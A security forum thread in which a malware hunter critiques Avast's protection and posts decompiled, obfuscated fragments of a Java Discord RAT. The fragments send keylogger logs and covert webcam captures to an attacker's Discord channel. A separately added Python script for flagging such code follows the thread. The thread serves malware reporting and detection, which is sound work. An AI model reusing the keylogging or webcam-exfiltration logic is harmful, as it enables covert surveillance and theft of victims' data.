Author Topic: Avast/AVG Protection Feedback  (Read 1641 times)


Offline McMcBrad

  • Newbie
  • *
  • Posts: 17
Avast/AVG Protection Feedback
« on: December 01, 2020, 03:09:56 PM »
Hi,

I am a malware hunter and I've been experimenting with Avast recently.

It offers great malware protection, but I've noticed several glitches and areas for improvement:

Java Malware:
Avast is one of the few vendors blocking Java malware effectively, but real-time protection doesn't block *.jar files as soon as they are created. Unless you right-click-scan the item, malware gets blocked by IDP seconds after opening, even though there is a detection in definitions. This looks like a scanning glitch.

C&C Servers:
Avast hasn't developed technology that blocks connection to known C&C servers. Web Shield blocks dangerous downloads and phishing, but all other connections are allowed. This may be a great area for improvement.
I'm sure you have a database of known C&C servers and it won't be too hard for you to extract them from malware during analysis. It will boost your protection to unprecedented levels.

Correction:
There is an option for blocking known C&C servers in settings, but it doesn't look very effective. I tried many RATs connecting mainly to domains *.hopto.org, some of them months old and they are still not blocked.

Ransomware Protection:
It would've been great to be able to select different modes for different folders, instead of just selecting one mode in general.
Extracting domains from malware and analysing relationships on VT might be a good idea.

Webcam Protection:
I was experimenting with NJRAT (downloading pre-built servers) and several times I had attackers connected. They could turn on my webcam, so I suggest you download some RATs and test/fix this.

Scripts, fileless malware:
This is a bit of a hit and miss (tends to be effective with minor exceptions). I suggest you have a look at tools, such as Invoke-Obfuscation Master as well as maldocs and develop generic methods to block downloaders and droppers, especially when they abuse common Windows processes (wscript, cscript and others) and are obfuscated.

Removal:
I noticed sometimes removed malware remains in memory (that happened with NJRAT servers again). I think the way you terminate processes should be improved.
Otherwise, due to the IDP I believe, you have great correlation and remove malware in their entirety, unlike many others. I tested your ability to remove scheduled tasks with malicious PowerShell code and you did great.

Firewall:
Firewall doesn't seem to scan programs for viruses before allowing them to connect, as on my test it allowed threats for which it had a detection. It would be a good idea not to allow known malware to connect, as well as maybe a "hardened mode", where all untrusted executables are blocked from connecting.

As a side note, I sent you some pretty interesting samples days ago and they are still undetected. I sent you a JPHP Coinminer and Python Stealer, which I discovered myself. At the time of sending, it had a very low detection (only Kaspersky, ZoneAlarm indirectly and one more). I was expecting you to take it more seriously, but there is no detection to date.
It could've made a great article.
GData analyst already published an article on the samples I discovered: https://www.gdatasoftware.com/blog/icerat-evades-antivirus-by-using-jphp
« Last Edit: December 03, 2020, 02:53:54 PM by McMcBrad »

Offline schmidthouse

  • VIRUS FREE A Long Time
  • Avast Evangelist
  • Starting Graphoman
  • ***
  • Posts: 7077
  • When you think you know, Think Again
Re: Avast/AVG Protection Feedback
« Reply #1 on: December 02, 2020, 12:06:51 AM »
Well that's interesting enough.
***HP ENVY 15K LT W10 Pro 21H1 64Bit/750GB HD/16GB Ram/Avast Premium 21.9.2491b/Secureline VPN v.5.12.5699b/ADU v.21.3b/ASB v.94.0b/SANDBOXIE-plus/MailWasherPRO
**HP Compaq 8510p LT W10 Pro 20H2 64Bit/1TB HD/8GB Ram/WD/ADU v.21.3b/SANDBOXIE/MailWasherPRO/HotSpot Shield
     
RIP*Dell Inspiron XPsp4 PRO 32Bit/Avast(since 2002)18.8.2356/WP/Comodo FW 3.14/Secureline/Comodo IceDragon v.40
LAYERED SECURITY SOFTWARE

Offline McMcBrad

  • Newbie
  • *
  • Posts: 17
Re: Avast/AVG Protection Feedback
« Reply #2 on: December 02, 2020, 01:05:27 AM »
Which statement do you find interesting?

Offline Asyn

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 72224
    • >>>  Avast Forum - Deutschsprachiger Bereich  <<<
Re: Avast/AVG Protection Feedback
« Reply #3 on: December 03, 2020, 12:29:25 PM »
Hi McMcBrad, welcome to the forum..!! :)

Just in case you need them, I'll add a few links...

• You can submit your feedback or a bug report in "About Avast". (Add a link to this thread)
• Submitting suggestions/ideas: https://forum.avast.com/index.php?topic=235975.0
• You can report a suspicious/malicious sample (File/Website) here: https://www.avast.com/report-malicious-file.php
• Avast Bug Bounty Program: https://www.avast.com/bug-bounty

PS: For the interested ones, see: https://malwaretips.com/threads/avast-premium-security-20-9.105149/
Win 8.1 [x64] - Avast PremSec 21.9.6660.IBC [UI.671] - EEK - Firefox ESR 78.15 [NS/uBO/PB] - TB 91.2
Avast-Tools: Secure Browser 94.0 - Cleanup 21.3 - SecureLine 5.13 - Driver Updater 21.3 - CCleaner 5.85
Avast Wissenswertes (Downloads, Anleitungen & Infos): https://forum.avast.com/index.php?topic=60523.0

Offline McMcBrad

  • Newbie
  • *
  • Posts: 17
Re: Avast/AVG Protection Feedback
« Reply #4 on: December 03, 2020, 08:36:30 PM »
Using the link above I have submitted a Java Discord RAT (at the time of sending VT 1/58), almost 24 hours later, there is still no detection.
Although the C&C server is dead, I don't believe a program with the following code is safe.
Code: [Select]
FΑΚECRACKМЕΑААAAAΑАAА = new int[2];
        KeyLoggerModule.FΑΚECRACKМЕΑААAAAΑАAА[0] = ((String)((Object)Dispatcher.bootstrap("get", 9L))).length();
        KeyLoggerModule.FΑΚECRACKМЕΑААAAAΑАAА[1] = "".length();


while (true) {
                DiscordUtils.sendMessage((Color)Color.GREEN, (String)((String)Dispatcher.bootstrap("get", 98784247905L) + Initializer.instance.UID + (String)Dispatcher.bootstrap("get", 29L)), (String)"", null, (MessageReceivedEvent)var2_2);
                try {
                    var3_4 = new FileWriter(KeyLoggerHelper.logs);
                    var3_4.write(KeyLoggerHelper.text);
                    var3_4.close();

  var2_2.getChannel().sendFile(KeyLoggerHelper.logs, new AttachmentOption[KeyLoggerModule.FΑΚECRACKМЕΑААAAAΑАAА[1]]).queue();
« Last Edit: December 04, 2020, 04:38:36 PM by McMcBrad »

Offline Asyn

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 72224
    • >>>  Avast Forum - Deutschsprachiger Bereich  <<<
Re: Avast/AVG Protection Feedback
« Reply #5 on: December 04, 2020, 09:17:36 AM »
Please use "Insert Code", else the post can get blocked or removed. Thanks

Code: [Select]
Example for code...

yada yada yada

Offline McMcBrad

  • Newbie
  • *
  • Posts: 17
Re: Avast/AVG Protection Feedback
« Reply #6 on: December 04, 2020, 06:45:06 PM »
Quote from: Asyn on December 04, 2020, 09:17:36 AM
Please use "Insert Code", else the post can get blocked or removed. Thanks

Code: [Select]
Example for code...

yada yada yada

Thank you and thanks for welcoming me to the forum.

Offline Asyn

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 72224
    • >>>  Avast Forum - Deutschsprachiger Bereich  <<<
Re: Avast/AVG Protection Feedback
« Reply #7 on: December 05, 2020, 01:40:07 PM »
No problem, always good to see new smart/interested guys around. :)

Offline Pondus

  • Probably Bot
  • ****
  • Posts: 37106
Re: Avast/AVG Protection Feedback
« Reply #8 on: December 05, 2020, 07:33:12 PM »
Quote from: McMcBrad on December 03, 2020, 08:36:30 PM
Using the link above I have submitted a Java Discord RAT (at the time of sending VT 1/58), almost 24 hours later, there is still no detection.
Although the C&C server is dead, I don't believe a program with the following code is safe.
No detection on that code

https://www.virustotal.com/gui/file/9f6f061e9fab24e89bae2069089cce43cc1338d347779ce4722b6b70246b566e/detection



Offline McMcBrad

  • Newbie
  • *
  • Posts: 17
Re: Avast/AVG Protection Feedback
« Reply #9 on: December 05, 2020, 08:23:53 PM »
Quote from: Pondus on December 05, 2020, 07:33:12 PM
Quote from: McMcBrad on December 03, 2020, 08:36:30 PM
Using the link above I have submitted a Java Discord RAT (at the time of sending VT 1/58), almost 24 hours later, there is still no detection.
Although the C&C server is dead, I don't believe a program with the following code is safe.
No detection on that code

https://www.virustotal.com/gui/file/9f6f061e9fab24e89bae2069089cce43cc1338d347779ce4722b6b70246b566e/detection

There can be no detection on that code, as I have taken it out of context.
It comes from a program with no visible window that imports the sarxos cam library and contains interesting modules you can see in the attachment.
This is the report of the program: https://www.virustotal.com/gui/file-analysis/MWM5N2UzOWU4OGJkZGZkY2UxZWIyNmE3OWYyYWEyNzM6MTYwNzE5NjIxMQ==/detection

The following code snippet saves a camera image (obviously without your knowledge, as again, there is no visible window) and sends it to an attacker via Discord:

Code: [Select]
  File file = new File(Initializer.instance.Dir, (String)((Object)Dispatcher.bootstrap("get", 201863462934L)));
        try {
            webcam = Webcam.getDefault();
            bl = webcam.isOpen();
        }
        catch (NullPointerException nullPointerException) {
            DiscordUtils.sendMessage((Color)Color.RED, (String)((String)((Object)Dispatcher.bootstrap("get", 201863462935L)) + Initializer.instance.UID + (String)((Object)Dispatcher.bootstrap("get", 29L))), (String)((Object)Dispatcher.bootstrap("get", 201863462936L)), null, (MessageReceivedEvent)messageReceivedEvent);
            return;
        }
        if (!bl) {
            if (error == null) {
                throw error;
            }
            webcam.open();
        }
        BufferedImage bufferedImage = webcam.getImage();
        boolean bl2 = webcam.isOpen();
        if (bl2) {
            if (error == null) {
                throw error;
            }
            webcam.close();
        }
        try {
            ImageIO.write((RenderedImage)bufferedImage, (String)((Object)Dispatcher.bootstrap("get", 90194313235L)), file);
        }
        catch (IOException iOException) {
            DiscordUtils.sendMessage((Color)Color.RED, (String)((String)((Object)Dispatcher.bootstrap("get", 201863462935L)) + Initializer.instance.UID + (String)((Object)Dispatcher.bootstrap("get", 29L))), (String)((Object)Dispatcher.bootstrap("get", 201863462937L)), null, (MessageReceivedEvent)messageReceivedEvent);
DiscordUtils.sendMessage((Color)Color.GREEN, (String)((String)((Object)Dispatcher.bootstrap("get", 201863462935L)) + Initializer.instance.UID + (String)((Object)Dispatcher.bootstrap("get", 29L))), (String)"", null, (MessageReceivedEvent)messageReceivedEvent);
        messageReceivedEvent.getChannel().sendFile(file, new AttachmentOption[FАKЕСRАCКМΕAAΑAAААΑΑΑ[1]]).queue();
        try {
           
« Last Edit: December 05, 2020, 08:38:19 PM by McMcBrad »
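As an added example (not code from this thread, from Avast, or from the sample's author), here is a small Python triage script a reviewer of decompiled Java could run to flag the three traits visible in the snippets posted above: identifiers that mix Latin letters with Greek or Cyrillic lookalikes (the FAKECRACK... array name), strings resolved at runtime through Dispatcher.bootstrap("get", N) instead of literals, and sarxos Webcam API calls. The sample input is constructed to mirror those snippets, and the two-of-three scoring threshold is my own assumption.

```python
import re
import unicodedata

# Constructed sample modelled on the decompiled snippets posted in this thread: the first
# identifier mixes Latin letters with Greek CAPITAL ALPHA (U+0391) and Cyrillic CAPITAL EM
# (U+041C), the homoglyph trick used by the FAKECRACK... array name in those snippets.
SAMPLE = (
    "F\u0391KECRACK\u041cE = new int[2];\n"
    'DiscordUtils.sendMessage(Color.GREEN, (String) Dispatcher.bootstrap("get", 98784247905L), "", null, ev);\n'
    'File file = new File(dir, (String) Dispatcher.bootstrap("get", 201863462934L));\n'
    "webcam = Webcam.getDefault();\n"
    "BufferedImage bufferedImage = webcam.getImage();\n"
    "int plainCounter = 0;\n"
)

IDENT_RE = re.compile(r"[^\W\d]\w*")  # Java-style identifiers; \w is Unicode-aware in Python 3
BOOTSTRAP_RE = re.compile(r'Dispatcher\.bootstrap\("get",\s*\d+L?\)')
WEBCAM_RE = re.compile(r"Webcam\.getDefault|webcam\.(?:open|getImage|close)")

def scripts_of(ident):
    """Unicode script names (LATIN, GREEK, CYRILLIC, ...) used by the letters of an identifier."""
    return {unicodedata.name(ch, "UNKNOWN").split(" ")[0] for ch in ident if ch.isalpha()}

def mixed_script_identifiers(src):
    """Identifiers whose letters span more than one script: a homoglyph-obfuscation marker."""
    return sorted({i for i in IDENT_RE.findall(src) if len(scripts_of(i)) > 1})

def count_bootstrap_lookups(src):
    """How many strings are resolved at runtime instead of appearing as literals."""
    return len(BOOTSTRAP_RE.findall(src))

def webcam_api_calls(src):
    """Distinct sarxos Webcam API calls, i.e. camera access from a program with no window."""
    return sorted(set(WEBCAM_RE.findall(src)))

def triage(src):
    """Combine the three indicators; the two-of-three threshold is my assumption, not a vendor rule."""
    findings = {
        "mixed_script_identifiers": mixed_script_identifiers(src),
        "bootstrap_string_lookups": count_bootstrap_lookups(src),
        "webcam_api_calls": webcam_api_calls(src),
    }
    hits = sum(bool(v) for v in findings.values())
    findings["verdict"] = "suspicious" if hits >= 2 else "review"
    return findings

if __name__ == "__main__":
    print(triage(SAMPLE))
```

A legitimate webcam application trips only the third indicator and stays at "review"; it is the combination with homoglyph identifiers and runtime string lookups that pushes the verdict to "suspicious".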